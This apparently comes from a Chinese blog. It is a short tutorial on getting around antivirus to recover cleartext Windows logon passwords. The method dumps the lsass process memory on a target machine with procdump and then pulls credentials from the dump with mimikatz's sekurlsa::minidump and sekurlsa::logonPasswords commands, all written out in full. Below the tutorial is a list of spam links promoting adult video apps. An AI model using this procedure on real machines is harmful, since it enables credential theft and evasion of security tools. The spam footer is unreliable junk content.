众所周知mimikatz可以直接抓到存放在lsass进程中的明文密码，但是很多情况下有杀软这种瘟神挡道，我们必须另想办法。

procdump是微软官方提供的一个小工具，在微软官方有下载

下载地址

将工具拷贝到目标机器上执行如下命令（需要管理员权限）

Procdump.exe -accepteula -ma lsass.exe lsass.dmp

获得一个lsass进程的内存dump文件lsass.dmp，下面我就们就要用mimikatz（注意是alpha版的mimikatz，否则没有这个命令可用）获得dump文件的明文密码了。

但要注意dump文件和mimikatz的版本对应关系，对应关系如图：

将这个内存dump文件拷贝到mimikatz同目录下，双击打开mimikatz执行情况如图：

mimikatz # sekurlsa::minidump lsass.dmpSwitch to MINIDUMPmimikatz # sekurlsa::logonPasswords full

大功告成，菜鸟言论，仅供娱乐。

推荐阅读

成版人性视频app香蕉视频软件：在线看老司机国产视频的污污污美女免费软件

丝瓜视频看污片免费版：有提供老司机67194入口的最新大尺度直播视频app

秋葵视频app下载污免费版：可以在线观看免费成长视频的深夜老司机软件

男人的加油站app免费看污版：在线观看网红赛高酱资源的成版人性视频app

芭乐成视频人app下载性福宝：有提供网红赛高酱h福利大全的免费看黄神器

成版人抖音app网站富二代下载黄：免费看老司机福利ae视频的美女污直播秀场